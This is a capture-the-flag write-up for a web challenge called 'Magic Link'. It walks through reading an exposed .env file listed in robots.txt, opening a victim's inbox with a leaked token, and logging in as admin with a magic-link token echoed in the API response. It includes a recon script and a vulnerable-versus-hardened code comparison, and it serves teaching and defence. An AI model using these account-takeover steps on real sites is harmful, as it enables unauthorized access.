
2026-04-17 • ctf • easy • web

CTF web - Magic Link

Exposed .env and magic-link tokens leaked in the API response

web, misconfiguration, magic-link, recon, web-enumeration

Introduction

Target URL:

  • https://bluehens-magic-link.chals.io

Challenge description:

  • Not provided.

Recon

The homepage is a simple Magic Link Login Service with an email input.

When submitting any email, the application returns:

Magic link generated, check your email.

As usual, I checked robots.txt for hidden paths:

URL: https://bluehens-magic-link.chals.io/robots.txt

User-agent: *
Disallow: /inbox
Disallow: /dashboard
Disallow: /.env

The /.env endpoint is exposed and reveals sensitive values:

URL: https://bluehens-magic-link.chals.io/.env

TEDDYS_EMAIL=teddy@udctf.com
TEDDYS_TOKEN=udctf{d0n7_h057_y0ur_3nv_f113}
ADMIN_EMAIL=admin@udctf.com
INBOX_URL=http://localhost:5050/inbox?token=${TEDDYS_TOKEN}

First flag:

  • udctf{d0n7_h057_y0ur_3nv_f113}
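The two recon steps above (turn robots.txt Disallow lines into paths to probe, then read the leaked .env including its `${VAR}` reference) as an added helper script. This is example code written for this writeup, not the challenge's own code; the robots.txt and .env text are constructed inline to match what the target served, and the function names are this example's own.

```python
"""Added recon helper, not part of the original challenge or writeup.

Two things worth automating in this kind of challenge:
  1. robots.txt: every Disallow entry is a hint about a path the author did
     not want indexed, so each one becomes a candidate URL to request.
  2. A leaked .env file: parse KEY=VALUE lines and expand ${VAR} references,
     which is exactly how INBOX_URL embeds TEDDYS_TOKEN.
"""
import re
from urllib.parse import urljoin, urlsplit

BASE = "https://bluehens-magic-link.chals.io"

# Constructed to match the content served by the target during the CTF.
ROBOTS_TXT = """User-agent: *
Disallow: /inbox
Disallow: /dashboard
Disallow: /.env
"""

DOTENV_TEXT = """TEDDYS_EMAIL=teddy@udctf.com
TEDDYS_TOKEN=udctf{d0n7_h057_y0ur_3nv_f113}
ADMIN_EMAIL=admin@udctf.com
INBOX_URL=http://localhost:5050/inbox?token=${TEDDYS_TOKEN}
"""

# Key names that usually hold credentials; adjust to taste.
SECRET_HINT = re.compile(r"TOKEN|SECRET|KEY|PASS", re.I)
VAR_REF = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")


def robots_disallow_urls(robots_text, base):
    """Absolute URLs for each Disallow entry (a Disallow line blocks nothing)."""
    urls = []
    for line in robots_text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            urls.append(urljoin(base, value.strip()))
    return urls


def parse_dotenv(text):
    """Parse KEY=VALUE lines, expanding ${VAR} against keys seen earlier."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip().strip('"').strip("'")
        value = VAR_REF.sub(lambda m: env.get(m.group(1), ""), value)
        env[key.strip()] = value
    return env


def secret_keys(env):
    """Keys whose names suggest they hold credential material."""
    return [k for k in env if SECRET_HINT.search(k)]


def rebase_url(url, base):
    """INBOX_URL points at localhost:5050; keep path+query, swap in the public host."""
    parts = urlsplit(url)
    path = parts.path + ("?" + parts.query if parts.query else "")
    return urljoin(base, path)


if __name__ == "__main__":
    for u in robots_disallow_urls(ROBOTS_TXT, BASE):
        print("probe:", u)
    env = parse_dotenv(DOTENV_TEXT)
    print("secret-looking keys:", secret_keys(env))
    print("inbox on public host:", rebase_url(env["INBOX_URL"], BASE))
```

The `${VAR}` expansion is the part that matters here: once `TEDDYS_TOKEN` is resolved, `INBOX_URL` yields the exact query string needed for `/inbox`, which is what the next section uses.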

Exploitation Path

INBOX_URL points at localhost:5050, an internal mailbox service, but the same path and token work on the public host:

https://bluehens-magic-link.chals.io/inbox?token=udctf{d0n7_h057_y0ur_3nv_f113}

The inbox page initially shows:

Teddy's Inbox (Refreshes every 5s)

Then I submitted Teddy’s email on the main page to generate a login link. After refresh, Teddy’s inbox contained:

Click here to login

udctf{m4g1c_l1nks_4r3_w31rd}

Second flag:

  • udctf{m4g1c_l1nks_4r3_w31rd}

The link also redirects to Teddy's dashboard:

URL: https://bluehens-magic-link.chals.io/dashboard

Welcome Teddy

Flag:

Teddy's dashboard shows an empty Flag field, so the remaining flag belongs to a different account.

The login URL format looked like this:

https://bluehens-magic-link.chals.io/login/gEbZQj7UvunG2QYEfsV_zw

At this point, ADMIN_EMAIL from .env became relevant. I submitted admin@udctf.com in the form and inspected the JSON response to the form submission:

{
  "datetime": "2026-04-18T00:02:22.925782+00:00",
  "email": "admin@udctf.com",
  "ip-address": "10.1.0.20",
  "message": "Magic link generated, check your email.",
  "uuid": "xUC-uugdppPIoNzhE1v7DA"
}

The uuid is a 22-character URL-safe base64 string, the same shape as the token in /login/<token>, so I used:

https://bluehens-magic-link.chals.io/login/xUC-uugdppPIoNzhE1v7DA

Result:

Welcome Admin

Flag: udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Third flag:

  • udctf{y0u_4r3_m4g1c_l1nk_m4st3r}

Root Cause

  1. Sensitive environment variables were publicly exposed via /.env, and robots.txt advertised the path.
  2. The magic-link token (the uuid field) was returned in the JSON response to whoever submitted the form, not only delivered to the recipient's inbox.
  3. /login/<uuid> granted a session for whichever email the token was issued to, with no check that the requester controlled that inbox, no expiry and no single-use enforcement.
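Root causes 2 and 3 as code, added here as an illustration and not taken from the challenge's source: a minimal magic-link issuer that behaves like the target (token echoed in the API response, any known token accepted at /login) beside a hardened version (token only delivered to the inbox, stored as an HMAC, single-use, time-limited, uniform response). Class and method names are this example's own; the inbox is an in-memory dict standing in for mail delivery.

```python
"""Added example, not the challenge's code: vulnerable vs hardened magic links."""
import hmac
import secrets
import time


class VulnerableMagicLink:
    """Mirrors the behaviour observed in the challenge."""

    def __init__(self):
        self.tokens = {}    # token -> email it was issued for
        self.inboxes = {}   # email -> list of login links "delivered"

    def request_link(self, email):
        # 16 random bytes -> 22-char URL-safe base64, the same shape as the
        # challenge's uuid values.
        token = secrets.token_urlsafe(16)
        self.tokens[token] = email
        self.inboxes.setdefault(email, []).append(f"/login/{token}")
        # Bug (root cause 2): the token goes back to whoever submitted the form.
        return {"email": email,
                "message": "Magic link generated, check your email.",
                "uuid": token}

    def login(self, token):
        # Bug (root cause 3): any known token logs in as its owner, forever.
        return self.tokens.get(token)


class HardenedMagicLink:
    TTL = 600  # seconds a link stays valid

    def __init__(self, secret):
        self.secret = secret
        self.pending = {}   # HMAC(token) -> (email, expires_at)
        self.inboxes = {}

    def _h(self, token):
        # Store only a keyed hash so a leaked table does not yield usable links.
        return hmac.new(self.secret, token.encode(), "sha256").hexdigest()

    def request_link(self, email, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self.pending[self._h(token)] = (email, now + self.TTL)
        self.inboxes.setdefault(email, []).append(f"/login/{token}")
        # Same response for every address; the token never leaves the mailbox.
        return {"message": "If that address is registered, a link has been sent."}

    def login(self, token, now=None):
        now = time.time() if now is None else now
        # pop() makes the link single-use: a second attempt finds nothing.
        entry = self.pending.pop(self._h(token), None)
        if entry is None:
            return None
        email, expires_at = entry
        if now > expires_at:
            return None
        return email


def token_from_inbox(service, email):
    """Stand-in for the user clicking the newest link in their inbox."""
    link = service.inboxes[email][-1]
    return link.rsplit("/", 1)[1]


if __name__ == "__main__":
    v = VulnerableMagicLink()
    resp = v.request_link("admin@udctf.com")
    print("vulnerable: attacker logs in as", v.login(resp["uuid"]))

    h = HardenedMagicLink(b"server-side-secret")
    resp = h.request_link("admin@udctf.com")
    print("hardened response:", resp)
    tok = token_from_inbox(h, "admin@udctf.com")
    print("hardened: inbox owner logs in as", h.login(tok))
    print("hardened: replay ->", h.login(tok))
```

The `now` parameter exists so expiry can be exercised deterministically; in production it is simply the clock. Binding the token to the requester's session as well (so the link only completes the login in the browser that asked for it) is a further step, but the three changes shown above already close both paths used in this challenge.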